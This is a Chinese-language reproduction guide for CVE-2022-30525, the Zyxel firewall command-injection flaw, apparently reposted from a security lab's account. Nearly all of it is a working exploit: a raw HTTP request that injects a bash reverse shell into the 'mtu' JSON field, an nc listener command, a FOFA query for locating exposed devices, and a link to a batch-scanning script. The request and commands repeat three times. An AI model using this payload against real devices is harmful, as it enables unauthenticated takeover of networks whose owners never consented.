CVE-2022-30525 Zyxel 防火墙命令注入漏洞

本文转载于公众号：融云攻防实验室，原文地址：

漏洞复现 CVE-2022-30525 Zyxel 防火墙命令注入漏洞

0x01 阅读须知

0x02 漏洞描述

2022 年 5 月 12 日，Zyxel（合勤）发布安全公告，修复了其防火墙设备中未经身份验证的远程命令注入漏洞（CVE-2022-30525），该漏洞的CVSS评分为9.8。该漏洞存在于某些Zyxel防火墙版本的 CGI 程序中，允许在未经身份验证的情况下在受影响设备上以nobody用户身份执行任意命令。

0x03 漏洞复现

漏洞影响:

fofa:body=”USG FLEX 50 (USG20-VPN)” 等

1.执行反弹shell命令

POST /ztp/cgi-bin/handler HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Content-Type: application/json
Connection: close
Content-Length: 175
{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"1270\",\"vlan_tagged\"
:\"1270\",\"vlanid\":\"1270\",\"mtu\":\"; bash -c \'exec bash -i &>/dev/tcp/ip/port <&1\';\",\"data\":\"hi\"}
POST /ztp/cgi-bin/handler HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Content-Type: application/json
Connection: close
Content-Length: 175

{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"1270\",\"vlan_tagged\"
:\"1270\",\"vlanid\":\"1270\",\"mtu\":\"; bash -c \'exec bash -i &>/dev/tcp/ip/port <&1\';\",\"data\":\"hi\"}

POST /ztp/cgi-bin/handler HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Content-Type: application/json
Connection: close
Content-Length: 175

{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"1270\",\"vlan_tagged\"
:\"1270\",\"vlanid\":\"1270\",\"mtu\":\"; bash -c \'exec bash -i &>/dev/tcp/ip/port <&1\';\",\"data\":\"hi\"}

2. nc监听得到shell

nc -lvvp 7777
nc -lvvp 7777
nc -lvvp 7777

3. 批量验证参考脚本

https://github.com/Henry4E36/CVE-2022-30525/
https://github.com/Henry4E36/CVE-2022-30525/
https://github.com/Henry4E36/CVE-2022-30525/